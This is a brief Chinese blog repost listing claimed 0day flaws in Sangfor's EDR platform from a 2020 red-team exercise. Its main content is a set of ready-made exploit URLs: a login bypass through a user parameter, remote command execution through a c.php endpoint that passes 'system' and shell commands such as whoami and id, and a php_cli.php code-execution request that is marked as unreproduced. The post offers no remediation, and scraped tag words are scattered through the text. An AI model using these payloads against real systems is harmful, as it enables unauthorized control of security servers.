深信服EDR終端檢測響應平臺漏洞_2020HW

時間  2020-12-01
標籤 php html 瀏覽器 angular2 spa .net code htm blog 欄目 PHP 简体版
原文   原文鏈接

深信服edr 2020HW 0day

遠程命令執行漏洞
遠程代碼執行漏洞
任意用戶登錄漏洞

免密碼登錄 Payload

使用瀏覽器訪問
https://ip:prot/ui/login.php?user=任意字符

原文連接php

遠程命令執行

使用瀏覽器訪問
https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami

https://ip:prot/tool/log/c.php?strip_slashes=system&host=id&path=id&row=id&limit=id

原文連接html

遠程代碼執行

https://ip:prot/tool/php_cli.php?code=phpinfo();
未復現成功

原文連接瀏覽器

乾坤未定,你我皆是黑馬angular2

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程